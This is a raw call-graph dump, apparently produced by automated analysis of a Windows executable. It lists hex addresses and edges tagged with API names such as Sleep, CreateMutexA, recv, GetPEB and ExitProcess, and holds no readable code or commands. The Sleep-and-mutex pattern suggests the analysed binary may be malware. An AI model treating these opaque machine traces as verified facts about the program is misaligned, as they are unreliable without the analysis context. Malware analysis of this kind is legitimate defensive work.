10853->10854 10855 79bd9f 10854->10855 10855->10852 9886 78a856 9887 78a870 9886->9887 9894 78a892 shared_ptr 9886->9894 9888 78a94e 9887->9888 9887->9894 9890 78a953 Sleep CreateMutexA 9888->9890 9910 7b6c6a 9888->9910 9893 78a98e 9890->9893 9892 78a903 9895 7980c0 9894->9895 9899 7980de 9895->9899 9900 798104 9895->9900 9896 7981ee 9918 799270 9896->9918 9898 7981f3 9921 782480 9898->9921 9899->9892 9900->9896 9902 798158 9900->9902 9903 79817d 9900->9903 9902->9898 9913 79d3e2 9902->9913 9906 79d3e2 RtlAllocateHeap 9903->9906 9907 798169 __cftof 9903->9907 9906->9907 9908 7b6c6a RtlAllocateHeap 9907->9908 9909 7981d0 shared_ptr 9907->9909 9908->9896 9909->9892 9911 7b6bf6 __cftof RtlAllocateHeap 9910->9911 9912 7b6c79 __cftof 9911->9912 9914 782480 Concurrency::cancel_current_task __dosmaperr ___std_exception_copy 9913->9914 9917 79d401 Concurrency::cancel_current_task 9914->9917 9925 7b38af 9914->9925 9917->9907 9952 79c1b9 9918->9952 9922 78248e Concurrency::cancel_current_task 9921->9922 9923 7b38af ___std_exception_copy RtlAllocateHeap 9922->9923 9924 7824c3 9923->9924 9926 7b38bc ___std_exception_copy 9925->9926 9930 7824c3 9925->9930 9927 7b38e9 9926->9927 9926->9930 9931 7ba1f1 9926->9931 9940 7b8ba3 9927->9940 9930->9907 9932 7ba20c 9931->9932 9933 7ba1fe 9931->9933 9934 7b75f6 __dosmaperr RtlAllocateHeap 9932->9934 9933->9932 9936 7ba223 9933->9936 9935 7ba214 9934->9935 9943 7b6c5a 9935->9943 9938 7ba21e 9936->9938 9939 7b75f6 __dosmaperr RtlAllocateHeap 9936->9939 9938->9927 9939->9935 9941 7badf5 __freea RtlAllocateHeap 9940->9941 9942 7b8bbb 9941->9942 9942->9930 9946 7b6bf6 9943->9946 9945 7b6c66 9945->9938 9947 7ba7c8 __dosmaperr RtlAllocateHeap 9946->9947 9949 7b6c01 __cftof 9947->9949 9948 7b6c0f 9948->9945 9949->9948 9950 7b6bf6 __cftof RtlAllocateHeap 9949->9950 9951 7b6c66 9950->9951 9951->9945 9955 79c123 9952->9955 9954 79c1ca Concurrency::cancel_current_task 9958 7822e0 9955->9958 9957 79c135 9957->9954 9959 7b38af ___std_exception_copy RtlAllocateHeap 9958->9959 9960 782317 std::invalid_argument::invalid_argument 9959->9960 9960->9957 10899 783840 10900 7838f6 10899->10900 10902 78385f 10899->10902 10901 783920 10909 7991e0 10901->10909 10902->10900 10902->10901 10904 7838cd shared_ptr 10902->10904 10907 78391b 10902->10907 10906 797d50 RtlAllocateHeap 10904->10906 10905 783925 10906->10900 10908 7b6c6a RtlAllocateHeap 10907->10908 10908->10901 10910 79c1b9 RtlAllocateHeap 10909->10910 10911 7991ea 10910->10911 10911->10905 10912 783440 10917 782b30 10912->10917 10914 78344f Concurrency::cancel_current_task 10915 7b38af ___std_exception_copy RtlAllocateHeap 10914->10915 10916 783483 10915->10916 10918 7b38af ___std_exception_copy RtlAllocateHeap 10917->10918 10919 782b68 std::invalid_argument::invalid_argument 10918->10919 10919->10914 10920 783c47 10921 783c51 10920->10921 10924 783c5f 10921->10924 10936 7832d0 10921->10936 10922 783c68 10924->10922 10955 783810 10924->10955 10959 79c6ac 10936->10959 10938 78336b 10965 79c26a 10938->10965 10940 78333c __Mtx_unlock 10942 79c26a 5 API calls 10940->10942 10945 783350 std::invalid_argument::invalid_argument 10940->10945 10943 783377 10942->10943 10946 79c6ac GetSystemTimePreciseAsFileTime 10943->10946 10944 783314 10944->10938 10944->10940 10962 79bd4c 10944->10962 10945->10924 10947 7833af 10946->10947 10948 7833b6 __Cnd_broadcast 10947->10948 10949 79c26a 5 API calls 10947->10949 10950 79c26a 5 API calls 10948->10950 10951 7833d7 __Mtx_unlock 10948->10951 10949->10948 10950->10951 10952 79c26a 5 API calls 10951->10952 10953 7833eb 10951->10953 10954 78340e 10952->10954 10953->10924 10954->10924 10956 78381c 10955->10956 11038 782440 10956->11038 10969 79c452 10959->10969 10961 79c6b9 10961->10944 10986 79bb72 10962->10986 10964 79bd5c 10964->10944 10966 79c292 10965->10966 10967 79c274 10965->10967 10966->10966 10967->10966 10992 79c297 10967->10992 10970 79c4a8 10969->10970 10972 79c47a std::invalid_argument::invalid_argument 10969->10972 10970->10972 10975 79cf6b 10970->10975 10972->10961 10973 79c4fd __Xtime_diff_to_millis2 10973->10972 10974 79cf6b _xtime_get GetSystemTimePreciseAsFileTime 10973->10974 10974->10973 10976 79cf7a 10975->10976 10978 79cf87 __aulldvrm 10975->10978 10976->10978 10979 79cf44 10976->10979 10978->10973 10982 79cbea 10979->10982 10983 79cbfb GetSystemTimePreciseAsFileTime 10982->10983 10984 79cc07 10982->10984 10983->10984 10984->10978 10987 79bb9c 10986->10987 10988 79cf6b _xtime_get GetSystemTimePreciseAsFileTime 10987->10988 10991 79bba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 10987->10991 10989 79bbcf __Xtime_diff_to_millis2 10988->10989 10990 79cf6b _xtime_get GetSystemTimePreciseAsFileTime 10989->10990 10989->10991 10990->10991 10991->10964 10997 782ae0 10992->10997 10994 79c2ae 11004 79c1ff 10994->11004 10996 79c2bf Concurrency::cancel_current_task 10998 79bedf InitOnceExecuteOnce 10997->10998 10999 782af4 __dosmaperr 10998->10999 10999->10994 11000 7ba671 __cftof 4 API calls 10999->11000 11003 7b6ccc 11000->11003 11001 7b8bec __cftof 4 API calls 11002 7b6cf6 11001->11002 11003->11001 11005 79c20b __EH_prolog3_GS 11004->11005 11006 7980c0 RtlAllocateHeap 11005->11006 11007 79c23d 11006->11007 11012 7826b0 11007->11012 11009 79c252 11029 797970 11009->11029 11011 79c25a 11011->10996 11013 797a00 RtlAllocateHeap 11012->11013 11014 782702 11013->11014 11015 782725 11014->11015 11016 798f40 RtlAllocateHeap 11014->11016 11017 798f40 RtlAllocateHeap 11015->11017 11018 78278e 11015->11018 11016->11015 11017->11018 11019 7827ed shared_ptr 11018->11019 11021 7828b8 11018->11021 11020 7b38af ___std_exception_copy RtlAllocateHeap 11019->11020 11024 78284b 11020->11024 11022 7b6c6a RtlAllocateHeap 11021->11022 11022->11024 11023 78287a shared_ptr std::invalid_argument::invalid_argument 11023->11009 11024->11023 11025 7b6c6a RtlAllocateHeap 11024->11025 11026 7828c2 11025->11026 11034 7b3912 11026->11034 11028 7828e5 shared_ptr 11028->11009 11030 79797b 11029->11030 11031 797996 shared_ptr 11029->11031 11030->11031 11032 7b6c6a RtlAllocateHeap 11030->11032 11031->11011 11033 7979ba 11032->11033 11035 7b391f 11034->11035 11037 7b3926 11034->11037 11036 7b8ba3 ___std_exception_destroy RtlAllocateHeap 11035->11036 11036->11037 11037->11028 11041 79b5d6 11038->11041 11040 782472 11043 79b5f1 Concurrency::cancel_current_task 11041->11043 11042 7b8bec __cftof 4 API calls 11044 79b69f 11042->11044 11043->11042 11045 79b658 __cftof std::invalid_argument::invalid_argument 11043->11045 11045->11040 11046 7b6a44 11047 7b6a5c 11046->11047 11048 7b6a52 11046->11048 11064 7b698d 11047->11064 11059 7bb655 11048->11059 11051 7b6a59 11052 7b6a76 11067 7b68ed 11052->11067 11055 7b6a8a 11057 7b6aa8 11055->11057 11058 7badf5 __freea RtlAllocateHeap 11055->11058 11056 7bb655 RtlAllocateHeap 11056->11055 11058->11057 11060 7bb662 11059->11060 11061 7bb679 11060->11061 11070 7b75c0 11060->11070 11061->11051 11065 7b690a __cftof 4 API calls 11064->11065 11066 7b699f 11065->11066 11066->11052 11078 7b683b 11067->11078 11075 7b75e3 11070->11075 11072 7b75cb __dosmaperr 11073 7b75f6 __dosmaperr RtlAllocateHeap 11072->11073 11074 7b75de 11073->11074 11074->11051 11076 7ba7c8 __dosmaperr RtlAllocateHeap 11075->11076 11077 7b75e8 11076->11077 11077->11072 11079 7b6849 11078->11079 11080 7b6863 11078->11080 11091 7b69cc 11079->11091 11082 7b686a 11080->11082 11084 7b6889 __cftof 11080->11084 11090 7b6853 11082->11090 11095 7b69e6 11082->11095 11085 7b69e6 RtlAllocateHeap 11084->11085 11087 7b689f __cftof 11084->11087 11085->11087 11086 7b75c0 __dosmaperr RtlAllocateHeap 11088 7b68ab 11086->11088 11087->11086 11087->11090 11089 7b75f6 __dosmaperr RtlAllocateHeap 11088->11089 11089->11090 11090->11055 11090->11056 11092 7b69d7 11091->11092 11093 7b69df 11091->11093 11094 7badf5 __freea RtlAllocateHeap 11092->11094 11093->11090 11094->11093 11096 7b69cc RtlAllocateHeap 11095->11096 11097 7b69f4 11096->11097 11100 7b6a25 11097->11100 11101 7bb04b __cftof RtlAllocateHeap 11100->11101 11102 7b6a05 11101->11102 11102->11090 9711 7b6629 9714 7b64c7 9711->9714 9715 7b64d5 __cftof 9714->9715 9716 7b6520 9715->9716 9719 7b652b 9715->9719 9718 7b652a 9725 7ba302 GetPEB 9719->9725 9721 7b6535 9722 7b653a GetPEB 9721->9722 9723 7b654a __cftof 9721->9723 9722->9723 9724 7b6562 ExitProcess 9723->9724 9726 7ba31c __cftof 9725->9726 9726->9721 11114 781020 11115 7980c0 RtlAllocateHeap 11114->11115 11116 781031 11115->11116 11117 79d64e RtlAllocateHeap 11116->11117 11118 78103b 11117->11118 11149 78a418 11152 78a420 shared_ptr 11149->11152 11150 78a4f3 shared_ptr 11155 7980c0 RtlAllocateHeap 11150->11155 11151 78a93f 11153 7b6c6a RtlAllocateHeap 11151->11153 11152->11150 11152->11151 11154 78a944 11153->11154 11156 7b6c6a RtlAllocateHeap 11154->11156 11157 78a903 11155->11157 11158 78a949 11156->11158 11159 78a94e 11158->11159 11160 7b6c6a RtlAllocateHeap 11158->11160 11161 78a953 Sleep CreateMutexA 11159->11161 11162 7b6c6a RtlAllocateHeap 11159->11162 11160->11159 11163 78a98e 11161->11163 11162->11161 11200 782e00 11201 782e28 11200->11201 11204 79c68b 11201->11204 11207 79c3d5 11204->11207 11206 782e33 11208 79c3eb 11207->11208 11209 79c3e1 11207->11209 11208->11206 11210 79c39e 11209->11210 11211 79c3be 11209->11211 11210->11208 11216 79ccd5 11210->11216 11220 79cd0a 11211->11220 11213 79c3d0 11213->11206 11217 79c3b7 11216->11217 11218 79cce3 InitializeCriticalSectionEx 11216->11218 11217->11206 11218->11217 11221 79cd1f RtlInitializeConditionVariable 11220->11221 11221->11213 11222 781000 11223 79d64e RtlAllocateHeap 11222->11223 11224 78100a 11223->11224 11235 799ef0 11236 799f0c 11235->11236 11237 79c68b __Mtx_init_in_situ 2 API calls 11236->11237 11238 799f17 11237->11238 11239 7c44f2 11240 7c450c 11239->11240 11241 7c44ff 11239->11241 11243 7c4518 11240->11243 11244 7b75f6 __dosmaperr RtlAllocateHeap 11240->11244 11242 7b75f6 __dosmaperr RtlAllocateHeap 11241->11242 11245 7c4504 11242->11245 11246 7c4539 11244->11246 11247 7b6c5a __cftof RtlAllocateHeap 11246->11247 11247->11245 11248 786ae9 11251 786b01 11248->11251 11249 7980c0 RtlAllocateHeap 11250 786bac 11249->11250 11252 799280 RtlAllocateHeap 11250->11252 11251->11249 11253 786bbd shared_ptr 11251->11253 11252->11253 11254 7980c0 RtlAllocateHeap 11253->11254 11255 786ce3 shared_ptr std::invalid_argument::invalid_argument 11254->11255 11304 789adc 11306 789aea shared_ptr 11304->11306 11305 78a917 11307 78a953 Sleep CreateMutexA 11305->11307 11308 7b6c6a RtlAllocateHeap 11305->11308 11306->11305 11312 789b4b shared_ptr 11306->11312 11315 78a98e 11307->11315 11308->11307 11309 789b59 11313 7980c0 RtlAllocateHeap 11309->11313 11310 789b65 11311 797a00 RtlAllocateHeap 11310->11311 11314 789b74 11311->11314 11312->11309 11312->11310 11316 78a903 11313->11316 11317 785c10 4 API calls 11314->11317 11318 789b7c 11317->11318 11331 788b30 11318->11331 11320 789b8d 11321 798220 RtlAllocateHeap 11320->11321 11322 789b9c 11321->11322 11323 797a00 RtlAllocateHeap 11322->11323 11324 789ca9 11323->11324 11325 785c10 4 API calls 11324->11325 11326 789cb1 11325->11326 11327 788b30 4 API calls 11326->11327 11328 789cc2 11327->11328 11329 798220 RtlAllocateHeap 11328->11329 11330 789cd1 11329->11330 11332 788b7c 11331->11332 11333 797a00 RtlAllocateHeap 11332->11333 11334 788b8c 11333->11334 11335 785c10 4 API calls 11334->11335 11336 788b97 11335->11336 11337 7980c0 RtlAllocateHeap 11336->11337 11338 788be3 11337->11338 11339 7980c0 RtlAllocateHeap 11338->11339 11340 788c35 11339->11340 11341 798220 RtlAllocateHeap 11340->11341 11344 788c47 shared_ptr 11341->11344 11342 788d01 shared_ptr std::invalid_argument::invalid_argument 11342->11320 11343 7b6c6a RtlAllocateHeap 11345 788d2d 11343->11345 11344->11342 11344->11343 11346 797a00 RtlAllocateHeap 11345->11346 11347 788d8f 11346->11347 11348 785c10 4 API calls 11347->11348 11349 788d9a 11348->11349 11350 7980c0 RtlAllocateHeap 11349->11350 11351 788dec 11350->11351 11352 798220 RtlAllocateHeap 11351->11352 11354 788dfe shared_ptr 11352->11354 11353 788e7e shared_ptr std::invalid_argument::invalid_argument 11353->11320 11354->11353 11355 7b6c6a RtlAllocateHeap 11354->11355 11356 788eaa 11355->11356 11357 797a00 RtlAllocateHeap 11356->11357 11358 788f0f 11357->11358 11359 785c10 4 API calls 11358->11359 11360 788f1a 11359->11360 11361 7980c0 RtlAllocateHeap 11360->11361 11362 788f6c 11361->11362 11363 798220 RtlAllocateHeap 11362->11363 11365 788f7e shared_ptr 11363->11365 11364 788ffe shared_ptr std::invalid_argument::invalid_argument 11364->11320 11365->11364 11366 7b6c6a RtlAllocateHeap 11365->11366 11367 78902a 11366->11367 11402 782ec0 11403 782f06 11402->11403 11408 782f6f 11402->11408 11404 79c6ac GetSystemTimePreciseAsFileTime 11403->11404 11405 782f12 11404->11405 11406 782f1d 11405->11406 11407 78301e 11405->11407 11412 79d3e2 RtlAllocateHeap 11406->11412 11414 782f30 __Mtx_unlock 11406->11414 11410 79c26a 5 API calls 11407->11410 11409 782fef 11408->11409 11415 79c6ac GetSystemTimePreciseAsFileTime 11408->11415 11411 783024 11410->11411 11413 79c26a 5 API calls 11411->11413 11412->11414 11416 782fb9 11413->11416 11414->11408 11414->11411 11415->11416 11417 79c26a 5 API calls 11416->11417 11418 782fc0 __Mtx_unlock 11416->11418 11417->11418 11419 79c26a 5 API calls 11418->11419 11420 782fd8 __Cnd_broadcast 11418->11420 11419->11420 11420->11409 11421 79c26a 5 API calls 11420->11421 11422 78303c 11421->11422 11423 79c6ac GetSystemTimePreciseAsFileTime 11422->11423 11433 783080 shared_ptr __Mtx_unlock 11423->11433 11424 7831c5 11425 79c26a 5 API calls 11424->11425 11426 7831cb 11425->11426 11427 79c26a 5 API calls 11426->11427 11428 7831d1 11427->11428 11429 79c26a 5 API calls 11428->11429 11435 783193 __Mtx_unlock 11429->11435 11430 7831a7 std::invalid_argument::invalid_argument 11431 79c26a 5 API calls 11432 7831dd 11431->11432 11433->11424 11433->11426 11433->11430 11434 79c6ac GetSystemTimePreciseAsFileTime 11433->11434 11436 78315f 11434->11436 11435->11430 11435->11431 11436->11424 11436->11428 11436->11435 11437 79bd4c GetSystemTimePreciseAsFileTime 11436->11437 11437->11436 11393 78e0c0 recv 11394 78e122 recv 11393->11394 11395 78e157 recv 11394->11395 11396 78e191 11395->11396 11397 78e2b3 std::invalid_argument::invalid_argument 11396->11397 11398 79c6ac GetSystemTimePreciseAsFileTime 11396->11398 11399 78e2ee 11398->11399 11400 79c26a 5 API calls 11399->11400 11401 78e358 11400->11401 11458 79d0c7 11460 79d0d7 11458->11460 11459 79d17f 11460->11459 11461 79d17b RtlWakeAllConditionVariable 11460->11461 11462 789ab8 11464 789acc 11462->11464 11465 789b08 11464->11465 11466 789b4b shared_ptr 11465->11466 11469 78a917 11465->11469 11467 789b59 11466->11467 11468 789b65 11466->11468 11471 7980c0 RtlAllocateHeap 11467->11471 11470 797a00 RtlAllocateHeap 11468->11470 11472 78a953 Sleep CreateMutexA 11469->11472 11473 7b6c6a RtlAllocateHeap 11469->11473 11474 789b74 11470->11474 11475 78a903 11471->11475 11477 78a98e 11472->11477 11473->11472 11476 785c10 4 API calls 11474->11476 11478 789b7c 11476->11478 11479 788b30 4 API calls 11478->11479 11480 789b8d 11479->11480 11481 798220 RtlAllocateHeap 11480->11481 11482 789b9c 11481->11482 11483 797a00 RtlAllocateHeap 11482->11483 11484 789ca9 11483->11484 11485 785c10 4 API calls 11484->11485 11486 789cb1 11485->11486 11487 788b30 4 API calls 11486->11487 11488 789cc2 11487->11488 11489 798220 RtlAllocateHeap 11488->11489 11490 789cd1 11489->11490 11491 7842b0 11494 783ac0 11491->11494 11493 7842bb shared_ptr 11495 783af9 11494->11495 11496 7b6c6a RtlAllocateHeap 11495->11496 11502 783b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11495->11502 11497 783be6 11496->11497 11498 7832d0 6 API calls 11497->11498 11500 783c38 11497->11500 11498->11500 11499 7832d0 6 API calls 11503 783c5f 11499->11503 11500->11499 11500->11503 11501 783c68 11501->11493 11502->11493 11503->11501 11504 783810 4 API calls 11503->11504 11505 783cdb 11504->11505 11506 797d50 RtlAllocateHeap 11505->11506 11507 783d52 11505->11507 11506->11507 11508 79d3e2 RtlAllocateHeap 11507->11508 11509 783d84 11508->11509 11510 797d50 RtlAllocateHeap 11509->11510 11511 783e03 11509->11511 11510->11511 11512 783e9b shared_ptr 11511->11512 11513 7b6c6a RtlAllocateHeap 11511->11513 11512->11493 11514 783ec1 11513->11514 11515 785cad 11517 785caf 11515->11517 11516 785d17 shared_ptr std::invalid_argument::invalid_argument 11517->11516 11518 7b6c6a RtlAllocateHeap 11517->11518 11519 785d47 __cftof 11518->11519 11519->11519 11520 7980c0 RtlAllocateHeap 11519->11520 11522 785e3e 11520->11522 11521 785ea6 shared_ptr std::invalid_argument::invalid_argument 11522->11521 11523 7b6c6a RtlAllocateHeap 11522->11523 11524 785ed2 11523->11524 11525 785ffe shared_ptr std::invalid_argument::invalid_argument 11524->11525 11526 7b6c6a RtlAllocateHeap 11524->11526 11527 78601b 11526->11527 11528 7980c0 RtlAllocateHeap 11527->11528 11529 786089 11528->11529 11530 7980c0 RtlAllocateHeap 11529->11530 11531 7860bd 11530->11531 11532 7980c0 RtlAllocateHeap 11531->11532 11533 7860ee 11532->11533 11534 7980c0 RtlAllocateHeap 11533->11534 11535 78611f 11534->11535 11536 7980c0 RtlAllocateHeap 11535->11536 11538 786150 11536->11538 11537 7865b1 shared_ptr std::invalid_argument::invalid_argument 11538->11537 11539 7b6c6a RtlAllocateHeap 11538->11539 11540 7865dc 11539->11540 11541 797a00 RtlAllocateHeap 11540->11541 11542 7866a6 11541->11542 11543 785c10 4 API calls 11542->11543 11544 7866ac 11543->11544 11545 785c10 4 API calls 11544->11545 11546 7866b1 11545->11546 11547 7822c0 4 API calls 11546->11547 11548 7866c9 shared_ptr 11547->11548 11549 797a00 RtlAllocateHeap 11548->11549 11550 786732 11549->11550 11551 785c10 4 API calls 11550->11551 11552 78673d 11551->11552 11553 7822c0 4 API calls 11552->11553 11562 786757 shared_ptr 11553->11562 11554 786852 11555 7980c0 RtlAllocateHeap 11554->11555 11557 78689c 11555->11557 11556 797a00 RtlAllocateHeap 11556->11562 11558 7980c0 RtlAllocateHeap 11557->11558 11561 7868e3 shared_ptr std::invalid_argument::invalid_argument 11558->11561 11559 785c10 4 API calls 11559->11562 11560 7822c0 4 API calls 11560->11562 11562->11554 11562->11556 11562->11559 11562->11560 11603 7820a0 11604 79c68b __Mtx_init_in_situ 2 API calls 11603->11604 11605 7820ac 11604->11605 11606 79d64e RtlAllocateHeap 11605->11606 11607 7820b6 11606->11607 11608 7834a0 11609 7834aa 11608->11609 11610 7834ca shared_ptr 11608->11610 11609->11610 11611 7b6c6a RtlAllocateHeap 11609->11611 11612 7834f2 Concurrency::cancel_current_task shared_ptr 11611->11612 11613 785a9e 11616 785a61 11613->11616 11614 7980c0 RtlAllocateHeap 11614->11616 11616->11613 11616->11614 11617 797a00 RtlAllocateHeap 11616->11617 11618 785bdd std::invalid_argument::invalid_argument 11616->11618 11619 785730 11616->11619 11617->11616 11623 785860 shared_ptr 11619->11623 11627 785799 shared_ptr 11619->11627 11620 78592a 11628 798200 11620->11628 11621 7980c0 RtlAllocateHeap 11621->11627 11624 785900 shared_ptr std::invalid_argument::invalid_argument 11623->11624 11625 7b6c6a RtlAllocateHeap 11623->11625 11624->11616 11626 785934 11625->11626 11627->11620 11627->11621 11627->11623 11631 79c1d9 11628->11631 11630 79820a 11634 79c15d 11631->11634 11633 79c1ea Concurrency::cancel_current_task 11633->11630 11635 7822e0 std::invalid_argument::invalid_argument RtlAllocateHeap 11634->11635 11636 79c16f 11635->11636 11636->11633 11644 783c8e 11645 783c98 11644->11645 11646 783cb4 11645->11646 11647 782410 5 API calls 11645->11647 11650 783810 4 API calls 11646->11650 11648 783ca5 11647->11648 11649 783ce0 RtlAllocateHeap 11648->11649 11649->11646 11651 783ccf 11650->11651 11652 783810 4 API calls 11651->11652 11653 783cdb 11652->11653 11654 797d50 RtlAllocateHeap 11653->11654 11655 783d52 11653->11655 11654->11655 11656 79d3e2 RtlAllocateHeap 11655->11656 11657 783d84 11656->11657 11658 797d50 RtlAllocateHeap 11657->11658 11659 783e03 11657->11659 11658->11659 11660 783e9b shared_ptr 11659->11660 11661 7b6c6a RtlAllocateHeap 11659->11661 11662 783ec1 11661->11662 11703 798680 11704 7986e0 11703->11704 11704->11704 11712 797760 11704->11712 11706 7986f9 11707 798f40 RtlAllocateHeap 11706->11707 11708 798714 11706->11708 11707->11708 11709 798f40 RtlAllocateHeap 11708->11709 11711 798769 11708->11711 11710 7987b1 11709->11710 11714 79777b 11712->11714 11725 797864 shared_ptr __cftof 11712->11725 11713 7978f1 11715 799270 RtlAllocateHeap 11713->11715 11714->11713 11717 7977fb __cftof 11714->11717 11718 7977ea 11714->11718 11720 797811 11714->11720 11714->11725 11716 7978f6 11715->11716 11719 782480 RtlAllocateHeap 11716->11719 11724 7b6c6a RtlAllocateHeap 11717->11724 11717->11725 11718->11716 11722 79d3e2 RtlAllocateHeap 11718->11722 11721 7978fb 11719->11721 11720->11717 11723 79d3e2 RtlAllocateHeap 11720->11723 11722->11717 11723->11717 11724->11713 11725->11706 11726 78a682 11727 78a68a shared_ptr 11726->11727 11728 78a949 11727->11728 11729 78a75d shared_ptr 11727->11729 11730 78a94e 11728->11730 11731 7b6c6a RtlAllocateHeap 11728->11731 11734 7980c0 RtlAllocateHeap 11729->11734 11732 78a953 Sleep CreateMutexA 11730->11732 11733 7b6c6a RtlAllocateHeap 11730->11733 11731->11730 11736 78a98e 11732->11736 11733->11732 11735 78a903 11734->11735 11737 783970 11738 79c68b __Mtx_init_in_situ 2 API calls 11737->11738 11739 7839a7 11738->11739 11740 79c68b __Mtx_init_in_situ 2 API calls 11739->11740 11741 7839e6 11740->11741 11742 782170 11747 79c6fc 11742->11747 11745 79d64e RtlAllocateHeap 11746 782184 11745->11746 11748 79c70c 11747->11748 11749 78217a 11747->11749 11748->11749 11751 79cfbe 11748->11751 11749->11745 11752 79ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 11751->11752 11753 79cfd0 11752->11753 11753->11748 11754 783770 11755 78379b 11754->11755 11756 7837cd shared_ptr 11755->11756 11757 7b6c6a RtlAllocateHeap 11755->11757 11758 78380f 11757->11758 11759 785f76 11761 785f81 shared_ptr 11759->11761 11760 785ffe shared_ptr std::invalid_argument::invalid_argument 11761->11760 11762 7b6c6a RtlAllocateHeap 11761->11762 11763 78601b 11762->11763 11764 7980c0 RtlAllocateHeap 11763->11764 11765 786089 11764->11765 11766 7980c0 RtlAllocateHeap 11765->11766 11767 7860bd 11766->11767 11768 7980c0 RtlAllocateHeap 11767->11768 11769 7860ee 11768->11769 11770 7980c0 RtlAllocateHeap 11769->11770 11771 78611f 11770->11771 11772 7980c0 RtlAllocateHeap 11771->11772 11774 786150 11772->11774 11773 7865b1 shared_ptr std::invalid_argument::invalid_argument 11774->11773 11775 7b6c6a RtlAllocateHeap 11774->11775 11776 7865dc 11775->11776 11777 797a00 RtlAllocateHeap 11776->11777 11778 7866a6 11777->11778 11779 785c10 4 API calls 11778->11779 11780 7866ac 11779->11780 11781 785c10 4 API calls 11780->11781 11782 7866b1 11781->11782 11783 7822c0 4 API calls 11782->11783 11784 7866c9 shared_ptr 11783->11784 11785 797a00 RtlAllocateHeap 11784->11785 11786 786732 11785->11786 11787 785c10 4 API calls 11786->11787 11788 78673d 11787->11788 11789 7822c0 4 API calls 11788->11789 11790 786757 shared_ptr 11789->11790 11791 786852 11790->11791 11793 797a00 RtlAllocateHeap 11790->11793 11796 785c10 4 API calls 11790->11796 11798 7822c0 4 API calls 11790->11798 11792 7980c0 RtlAllocateHeap 11791->11792 11794 78689c 11792->11794 11793->11790 11795 7980c0 RtlAllocateHeap 11794->11795 11797 7868e3 shared_ptr std::invalid_argument::invalid_argument 11795->11797 11796->11790 11798->11790 11842 78215a 11843 79c6fc InitializeCriticalSectionEx 11842->11843 11844 782164 11843->11844 11845 79d64e RtlAllocateHeap 11844->11845 11846 78216e 11845->11846 11847 78a54d 11848 78a555 shared_ptr 11847->11848 11849 78a628 shared_ptr 11848->11849 11850 78a944 11848->11850 11855 7980c0 RtlAllocateHeap 11849->11855 11851 7b6c6a RtlAllocateHeap 11850->11851 11852 78a949 11851->11852 11853 78a94e 11852->11853 11854 7b6c6a RtlAllocateHeap 11852->11854 11857 78a953 Sleep CreateMutexA 11853->11857 11858 7b6c6a RtlAllocateHeap 11853->11858 11854->11853 11856 78a903 11855->11856 11859 78a98e 11857->11859 11858->11857 11912 789f44 11913 789f4c shared_ptr 11912->11913 11914 78a01f shared_ptr 11913->11914 11915 78a92b 11913->11915 11918 7980c0 RtlAllocateHeap 11914->11918 11916 78a953 Sleep CreateMutexA 11915->11916 11917 7b6c6a RtlAllocateHeap 11915->11917 11919 78a98e 11916->11919 11917->11916 11920 78a903 11918->11920 11929 786535 11931 786549 shared_ptr 11929->11931 11930 7b6c6a RtlAllocateHeap 11933 7865dc 11930->11933 11931->11930 11932 7865b1 shared_ptr std::invalid_argument::invalid_argument 11931->11932 11934 797a00 RtlAllocateHeap 11933->11934 11935 7866a6 11934->11935 11936 785c10 4 API calls 11935->11936 11937 7866ac 11936->11937 11938 785c10 4 API calls 11937->11938 11939 7866b1 11938->11939 11940 7822c0 4 API calls 11939->11940 11941 7866c9 shared_ptr 11940->11941 11942 797a00 RtlAllocateHeap 11941->11942 11943 786732 11942->11943 11944 785c10 4 API calls 11943->11944 11945 78673d 11944->11945 11946 7822c0 4 API calls 11945->11946 11955 786757 shared_ptr 11946->11955 11947 786852 11948 7980c0 RtlAllocateHeap 11947->11948 11950 78689c 11948->11950 11949 797a00 RtlAllocateHeap 11949->11955 11951 7980c0 RtlAllocateHeap 11950->11951 11954 7868e3 shared_ptr std::invalid_argument::invalid_argument 11951->11954 11952 785c10 4 API calls 11952->11955 11953 7822c0 4 API calls 11953->11955 11955->11947 11955->11949 11955->11952 11955->11953 11956 7b6729 11959 7b6672 11956->11959 11958 7b673b 11962 7b667e __dosmaperr 11959->11962 11960 7b6685 11961 7b75f6 __dosmaperr RtlAllocateHeap 11960->11961 11964 7b668a 11961->11964 11962->11960 11963 7b66a5 11962->11963 11965 7b66aa 11963->11965 11966 7b66b7 11963->11966 11967 7b6c5a __cftof RtlAllocateHeap 11964->11967 11968 7b75f6 __dosmaperr RtlAllocateHeap 11965->11968 11973 7ba8c3 11966->11973 11972 7b6695 11967->11972 11968->11972 11970 7b66c0 11971 7b75f6 __dosmaperr RtlAllocateHeap 11970->11971 11970->11972 11971->11972 11972->11958 11974 7ba8cf __dosmaperr 11973->11974 11977 7ba967 11974->11977 11976 7ba8ea 11976->11970 11982 7ba98a 11977->11982 11978 7ba9d0 11978->11976 11979 7bd82f __dosmaperr RtlAllocateHeap 11980 7ba9eb 11979->11980 11981 7badf5 __freea RtlAllocateHeap 11980->11981 11981->11978 11982->11978 11982->11979 11982->11982 11988 784120 11989 78416a 11988->11989 11991 7841b2 std::invalid_argument::invalid_argument 11989->11991 11992 783ee0 11989->11992 11993 783f1e 11992->11993 11995 783f48 11992->11995 11993->11991 11994 783f58 11994->11991 11995->11994 11998 782c00 11995->11998 11999 79d3e2 RtlAllocateHeap 11998->11999 12000 782c0e 11999->12000 12008 79b847 12000->12008 12002 782c42 12003 782c49 12002->12003 12014 782c80 12002->12014 12003->11991 12005 782c58 12017 782560 12005->12017 12007 782c65 Concurrency::cancel_current_task 12009 79b854 12008->12009 12013 79b873 Concurrency::details::_Reschedule_chore 12008->12013 12020 79cb77 12009->12020 12011 79b864 12011->12013 12022 79b81e 12011->12022 12013->12002 12028 79b7fb 12014->12028 12016 782cb2 shared_ptr 12016->12005 12018 7b38af ___std_exception_copy RtlAllocateHeap 12017->12018 12019 782597 std::invalid_argument::invalid_argument 12018->12019 12019->12007 12021 79cb92 CreateThreadpoolWork 12020->12021 12021->12011 12023 79b827 Concurrency::details::_Reschedule_chore 12022->12023 12026 79cdcc 12023->12026 12025 79b841 12025->12013 12027 79cde1 TpPostWork 12026->12027 12027->12025 12029 79b817 12028->12029 12030 79b807 12028->12030 12029->12016 12030->12029 12032 79ca78 12030->12032 12033 79ca8d TpReleaseWork 12032->12033 12033->12029 12069 798320 12070 798339 12069->12070 12071 79834d 12070->12071 12072 798f40 RtlAllocateHeap 12070->12072 12072->12071 12073 78211c 12074 782126 12073->12074 12075 79d64e RtlAllocateHeap 12074->12075 12076 782132 